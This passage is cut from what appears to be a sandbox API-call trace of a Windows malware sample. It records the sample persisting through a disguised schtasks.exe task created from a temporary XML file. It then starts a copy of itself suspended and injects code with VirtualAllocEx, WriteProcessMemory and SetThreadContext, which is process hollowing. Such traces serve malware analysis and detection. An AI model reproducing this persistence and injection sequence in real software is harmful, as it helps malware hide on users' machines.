lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.746] VirtualProtect (in: lpAddress=0x5c551b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551bc, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.747] VirtualProtect (in: lpAddress=0x5c551ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x4dd57c | out: lpflOldProtect=0x4dd57c*=0x0) returned 0 [0181.801] CoTaskMemAlloc (cb=0x20c) returned 0x807840 [0181.801] GetEnvironmentVariableW (in: lpName="COR_PROFILER", lpBuffer=0x807840, nSize=0x104 | out: lpBuffer="\x80旀w\x02") returned 0x0 [0181.801] CoTaskMemFree (pv=0x807840) [0181.801] CoTaskMemAlloc (cb=0x20c) returned 0x807840 [0181.801] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x807840, nSize=0x104 | out: lpBuffer="\x80旀w\x02") returned 0x0 [0181.801] CoTaskMemFree (pv=0x807840) [0181.808] GetCurrentProcessId () returned 0x678 [0181.808] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0xfbc4 [0181.808] GetExitCodeProcess (in: hProcess=0xfbc4, lpExitCode=0x24e4760 | out: lpExitCode=0x24e4760*=0x103) returned 1 [0181.837] NtQueryInformationProcess (in: ProcessHandle=0xfbc4, ProcessInformationClass=0x0, ProcessInformation=0x4dd4a8, ProcessInformationLength=0x18, ReturnLength=0x4dd4a4 | out: ProcessInformation=0x4dd4a8, ReturnLength=0x4dd4a4) returned 0x0 [0181.849] EnumProcesses (in: lpidProcess=0x24e4f9c, cb=0x400, lpcbNeeded=0x4dd424 | out: lpidProcess=0x24e4f9c, lpcbNeeded=0x4dd424) returned 1 [0182.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34479a8, Length=0x20000, ResultLength=0x4dd4a4 | out: SystemInformation=0x34479a8, ResultLength=0x4dd4a4*=0x7cf0) returned 0x0 [0182.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4dd8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0182.800] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="wFeODqeBxkJvqrVbN") returned 0x0 [0182.803] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="wFeODqeBxkJvqrVbN") returned 0x12204 [0182.804] CoTaskMemAlloc (cb=0x20c) returned 0x812240 [0182.804] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x812240 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0182.804] CoTaskMemFree (pv=0x812240) [0182.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x4dd8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0182.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0182.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ddda0) returned 1 [0182.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), fInfoLevelId=0x0, lpFileInformation=0x4dde1c | out: lpFileInformation=0x4dde1c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x717ab990, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x717ab990, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x7181ddb0, ftLastWriteTime.dwHighDateTime=0x1d6a092, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0182.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ddd9c) returned 1 [0182.880] GetCurrentProcess () returned 0xffffffff [0182.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ddd68 | out: TokenHandle=0x4ddd68*=0x52c4) returned 1 [0182.883] GetCurrentProcess () returned 0xffffffff [0182.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ddd3c | out: TokenHandle=0x4ddd3c*=0x34d8) returned 1 [0182.884] GetTokenInformation (in: TokenHandle=0x52c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ddd70 | out: TokenInformation=0x0, ReturnLength=0x4ddd70) returned 0 [0182.884] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x7e4d70 [0182.884] GetTokenInformation (in: TokenHandle=0x52c4, TokenInformationClass=0x1, TokenInformation=0x7e4d70, TokenInformationLength=0x24, ReturnLength=0x4ddd70 | out: TokenInformation=0x7e4d70, ReturnLength=0x4ddd70) returned 1 [0182.886] LocalFree (hMem=0x7e4d70) returned 0x0 [0182.887] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x4ddc90, DesiredAccess=0x800, PolicyHandle=0x4ddc50 | out: PolicyHandle=0x4ddc50) returned 0x0 [0182.888] LsaLookupSids (in: PolicyHandle=0x7f0060, Count=0x1, Sids=0x247e91c*=0x247e8c0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x4ddc6c, Names=0x4ddc60 | out: ReferencedDomains=0x4ddc6c, Names=0x4ddc60) returned 0x0 [0182.889] LsaClose (ObjectHandle=0x7f0060) returned 0x0 [0182.890] LsaFreeMemory (Buffer=0x7f1768) returned 0x0 [0182.890] LsaFreeMemory (Buffer=0x80f170) returned 0x0 [0182.891] CoTaskMemAlloc (cb=0x20c) returned 0x812240 [0182.891] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x812240 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0182.891] CoTaskMemFree (pv=0x812240) [0182.891] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x4dd8a8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e [0182.892] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x4dd8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0182.892] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x4dd848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0182.892] CoTaskMemAlloc (cb=0x20c) returned 0x812240 [0182.893] GetTempFileNameW (in: lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x812240 | out: lpTempFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp1b7b.tmp")) returned 0x1b7b [0182.906] CoTaskMemFree (pv=0x812240) [0182.909] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", nBufferLength=0x105, lpBuffer=0x4dd764, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", lpFilePart=0x0) returned 0x3c [0182.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ddc58) returned 1 [0182.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp1b7b.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cf8 [0182.909] GetFileType (hFile=0x1cf8) returned 0x1 [0182.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ddc54) returned 1 [0182.909] GetFileType (hFile=0x1cf8) returned 0x1 [0182.911] WriteFile (in: hFile=0x1cf8, lpBuffer=0x2482acc*, nNumberOfBytesToWrite=0x695, lpNumberOfBytesWritten=0x4ddcf0, lpOverlapped=0x0 | out: lpBuffer=0x2482acc*, lpNumberOfBytesWritten=0x4ddcf0*=0x695, lpOverlapped=0x0) returned 1 [0182.912] CloseHandle (hObject=0x1cf8) returned 1 [0182.914] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x7f55e0 [0182.914] LocalAlloc (uFlags=0x0, uBytes=0xca) returned 0x7a0548 [0182.915] ShellExecuteExW (in: pExecInfo=0x2483e2c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2483e2c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x46fc)) returned 1 [0183.174] LocalFree (hMem=0x7f55e0) returned 0x0 [0183.174] LocalFree (hMem=0x7a0548) returned 0x0 [0183.174] GetCurrentProcess () returned 0xffffffff [0183.174] GetCurrentProcess () returned 0xffffffff [0183.174] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x46fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4ddd50, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x4ddd50*=0x131c0) returned 1 [0183.174] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x4ddd48*=0x131c0, lpdwindex=0x4ddb64 | out: lpdwindex=0x4ddb64) returned 0x0 [0183.463] CloseHandle (hObject=0x131c0) returned 1 [0183.463] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", nBufferLength=0x105, lpBuffer=0x4dd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", lpFilePart=0x0) returned 0x3c [0183.464] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp1b7b.tmp")) returned 1 [0183.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4dd850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0183.546] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4dda90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ddd8c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x4ddd8c*(hProcess=0xad8c, hThread=0x131c0, dwProcessId=0x7b8, dwThreadId=0x4c4)) returned 1 [0183.564] GetThreadContext (in: hThread=0x131c0, lpContext=0x248446c | out: lpContext=0x248446c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xd770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0183.574] ReadProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x7efde008, lpBuffer=0x4ddd74, nSize=0x4, lpNumberOfBytesRead=0x4dddc4 | out: lpBuffer=0x4ddd74*, lpNumberOfBytesRead=0x4dddc4*=0x4) returned 1 [0183.580] VirtualAllocEx (hProcess=0xad8c, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0183.601] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x400000, lpBuffer=0x33126f8*, nSize=0x400, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x33126f8*, lpNumberOfBytesWritten=0x4dddc4*=0x400) returned 1 [0183.625] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x401000, lpBuffer=0x2484744*, nSize=0x11c00, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x2484744*, lpNumberOfBytesWritten=0x4dddc4*=0x11c00) returned 1 [0183.653] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x413000, lpBuffer=0x2496350*, nSize=0x4a00, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x2496350*, lpNumberOfBytesWritten=0x4dddc4*=0x4a00) returned 1 [0183.715] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x418000, lpBuffer=0x249ae14*, nSize=0x600, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x249ae14*, lpNumberOfBytesWritten=0x4dddc4*=0x600) returned 1 [0183.736] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x54e000, lpBuffer=0x249b420*, nSize=0x2e00, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x249b420*, lpNumberOfBytesWritten=0x4dddc4*=0x2e00) returned 1 [0183.758] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x551000, lpBuffer=0x249e22c*, nSize=0x1000, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x249e22c*, lpNumberOfBytesWritten=0x4dddc4*=0x1000) returned 1 [0183.779] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x552000, lpBuffer=0x249f238*, nSize=0x200, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x249f238*, lpNumberOfBytesWritten=0x4dddc4*=0x200) returned 1 [0183.799] WriteProcessMemory (in: hProcess=0xad8c, lpBaseAddress=0x7efde008, lpBuffer=0x249f444*, nSize=0x4, lpNumberOfBytesWritten=0x4dddc4 | out: lpBuffer=0x249f444*, lpNumberOfBytesWritten=0x4dddc4*=0x4) returned 1 [0183.801] SetThreadContext (hThread=0x131c0, lpContext=0x248446c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, 